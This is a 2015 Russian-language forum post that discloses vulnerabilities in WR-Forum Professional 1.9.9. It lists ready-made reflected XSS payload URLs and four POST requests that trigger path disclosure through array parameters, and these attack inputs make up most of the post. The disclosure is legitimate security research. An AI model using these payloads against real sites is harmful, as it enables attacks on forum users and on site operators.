HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Уязвимости в WR-Forum Professional 1.9.9
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 28.06.2015, 18:11
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию
Представляю отчёт об уязвимостях, найденных мною в WR-Forum Professional 1.9.9

.1.Пассивная XSS

http://site.com/talk/pm.php?readpm&id=usver' onmouseover=prompt(/XSS/) bad='

http://site.com/talk/index.php/'onmouseover='prompt(/XSS/)'bad='



.2.Раскрытие путей

.2.1http://site.com/talk/tools.php?event=reg2

POSTDATA

email[]=sample@email.tst&name[]=Myl33tNickName&pass=Myl33tPWD&pol=bla bla bla&stime=Myl33tNum&usernum[]=Myl33tNum&xkey=Myl33tNum

.2.2http://site.com/talk/tools.php?find&event=go

POSTDATA

findme[]=the&ftype=0&gdefinder=1&withregistr=on

.2.3http://site.com/talk/tools.php?event=givmepassword

POSTDATA

myemail[]=sample%40email.tst&myname[]=Myl33tNickName

.2.4http://site.com/talk/tools.php?event=regenter

POSTDATA

name[]=Myl33tNickName&pass[]=Myl33tPWD



Как-то так. Возможно в тему будет что нибудь добавляться.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ